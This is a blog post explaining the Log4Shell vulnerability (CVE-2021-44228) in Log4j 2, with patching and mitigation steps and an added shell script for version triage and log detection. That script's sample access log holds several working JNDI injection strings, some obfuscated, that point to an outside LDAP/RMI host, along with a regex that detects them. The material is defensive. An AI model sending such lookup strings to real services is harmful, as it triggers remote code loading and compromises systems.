nabbisen

Posted on DEV Community • Originally published at scqr.net

About Apache Log4j RCE vulnerability (CVE-2021-44228)

Summary

  • Caused by the JNDI ("Java Naming and Directory Interface") lookup feature of Apache Log4j 2: when a logged message contains a lookup such as ${jndi:ldap://host/...}, Log4j resolves it at log time, so attacker-controlled input that ends up in a log line can make the application fetch and run code from a server the attacker chooses.
  • How severe is it? The CVSS score is 10.0, the maximum, meaning the highest possible risk rating.

Description

CVE-2021-44228 (named "Log4Shell", also referred to as "log4jam"): a remote code execution (RCE) vulnerability of the highest severity, discovered in Log4j 2, with a very wide reach. Log4j 2 versions from 2.0-beta9 through 2.14.1 are affected.

The reach is wide because Log4j is a Java library, Java is one of the most widely used general-purpose programming languages, and popular Java frameworks and products such as Spring, Struts, Logstash and Solr use Log4j internally, so an application can be affected without ever calling Log4j directly.

Unfortunately, the CVE-2021-44228 (Log4Shell) vulnerability is straightforward and easy for attackers to exploit: any attacker-controlled string that gets logged (a User-Agent header, a username, a search query) can carry the lookup. For services exposed to a network, especially the Internet, the situation is really dangerous.

It is considered a historic vulnerability, mentioned alongside Heartbleed and Shellshock (also called Bashdoor), both discovered in 2014.

Updating Log4j to version 2.15.0 or later is strongly recommended.

How to fix it

  • Strongly recommended: update Log4j to version 2.15.0 (or later).

Second-best, temporary ways to mitigate it

When it is difficult to update Log4j right away, the following are possible:

  • Put a WAF in front of the service to block requests carrying JNDI lookup strings. Treat this as a stopgap only: attackers obfuscate the string with nested lookups, so pattern rules are incomplete.
  • If the version is 2.10.0 or later: disable message lookups with the system property log4j2.formatMsgNoLookups=true (for example as the JVM option -Dlog4j2.formatMsgNoLookups=true) or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true. The JVM must be restarted for this to take effect.
  • Otherwise: remove the JndiLookup class (org.apache.logging.log4j.core.lookup.JndiLookup) from the log4j-core jar on the classpath, and restart the JVM.
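The triage steps above, carried through as an added example that is not code from the original post or from the Log4j project: a POSIX shell script that classifies a log4j-core version into the three cases (fixed / set the property / strip the class), scans a directory tree for log4j-core jars, wraps the Apache-documented zip command for the strip step, and runs a crude WAF-style regex over a constructed access-log sample. The jar naming (log4j-core-<version>.jar, which is how Maven publishes it), the sample log lines and the 203.0.113.x addresses are assumptions constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the original post: triage helpers for
# CVE-2021-44228 that follow the post's version rules.
# Assumptions: jars follow the Maven file name log4j-core-<version>.jar;
# the thresholds are the ones stated in the post (formatMsgNoLookups honoured
# from 2.10.0, fixed in 2.15.0); zip(1) is available for the strip step.

# Decide which of the post's mitigations applies to a log4j-core version.
#   fixed         2.15.0 or later: nothing to do
#   set-property  2.10.0 .. 2.14.x: -Dlog4j2.formatMsgNoLookups=true
#   strip-class   older 2.x (including 2.0-beta9): remove JndiLookup.class
#   unknown       not a Log4j 2 version (Log4j 1.x is a different code base)
log4j_mitigation_for_version() {
    v=$1
    major=${v%%.*}
    rest=${v#*.}
    minor=${rest%%.*}
    minor=${minor%%-*}          # 2.0-beta9 -> minor 0
    case $major in
        2) ;;
        *) echo unknown; return 1 ;;
    esac
    case $minor in
        ''|*[!0-9]*) echo unknown; return 1 ;;
    esac
    if [ "$minor" -ge 15 ]; then
        echo fixed
    elif [ "$minor" -ge 10 ]; then
        echo set-property
    else
        echo strip-class
    fi
}

# Walk a directory tree and print "<jar> <version> <mitigation>" for every
# log4j-core jar found, taking the version from the file name.
log4j_scan() {
    find "$1" -type f -name 'log4j-core-*.jar' | while IFS= read -r jar; do
        ver=${jar##*/}
        ver=${ver#log4j-core-}
        ver=${ver%.jar}
        printf '%s %s %s\n' "$jar" "$ver" "$(log4j_mitigation_for_version "$ver")"
    done
}

# Mitigation for versions below 2.10.0: delete the JndiLookup class from the
# jar in place (the command Apache documented for this case). Restart the JVM
# afterwards; an already-loaded class stays in memory until then.
log4j_strip_jndilookup() {
    zip -q -d "$1" org/apache/logging/log4j/core/lookup/JndiLookup.class
}

# Crude detection of lookup strings in request logs, the kind of rule a WAF
# would carry. Each of the letters j, n, d, i may be wrapped in a nested
# lookup, so it matches the plain "${jndi:" form as well as obfuscations such
# as "${${lower:j}ndi:" and "${${::-j}${::-n}${::-d}${::-i}:". Other evasions
# exist, which is why the post ranks a WAF below patching.
LOG4SHELL_RE='[$][{]([$][{][^}]*)?j[}]?([$][{][^}]*)?n[}]?([$][{][^}]*)?d[}]?([$][{][^}]*)?i[}]?:'

log4shell_grep()  { grep -iE  "$LOG4SHELL_RE" "$@"; }   # print matching lines
log4shell_count() { grep -ciE "$LOG4SHELL_RE" "$@"; }   # print the match count

# Constructed access-log sample (not real traffic): three hostile requests and
# two benign ones, one of which merely contains the word "jndi" in a URL.
sample_access_log() {
    cat <<'EOF'
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"
10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"
10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=${${lower:j}ndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 400 "-"
10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/a}"
10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 "curl/7.79.1"
EOF
}
```

Typical use: source the file, run `log4j_scan /opt/app` to see which case each deployed jar falls into, and run `log4shell_grep access.log` (or pipe `sample_access_log` into it) to confirm that the regex catches the constructed payloads while leaving the benign `jndi-tutorial.html` line alone. The version classifier deliberately reports `unknown` for Log4j 1.x jars, which this CVE does not cover, rather than silently calling them fixed.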

This post is based on tweets by my company.
